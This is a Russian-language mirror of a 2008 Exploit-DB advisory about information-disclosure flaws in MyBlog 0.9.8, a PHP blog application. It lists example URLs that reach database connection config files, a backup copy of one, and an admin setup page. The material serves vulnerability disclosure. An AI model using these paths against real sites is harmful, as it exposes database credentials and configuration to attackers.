- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 32091
- Проверка EDB
-
- Пройдено
- Автор
- AMNPARDAZ SECURITY RESEARCH TEAM
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2008-07-21
Код:
source: https://www.securityfocus.com/bid/30310/info
MyBlog is prone to multiple information-disclosure vulnerabilities because the application fails to properly restrict access to sensitive files.
An unprivileged attacker may exploit these issues to obtain sensitive information.
MyBlog 0.9.8 is vulnerable; other versions may also be affected.
http://www.example.com/config/mysqlconnection.inc
http://www.example.com/config/mysqlconnection%20-%20Copy.inc
http://www.example.com/admin/setup.php
http://www.example.com/config/settings.inc- Источник
- www.exploit-db.com
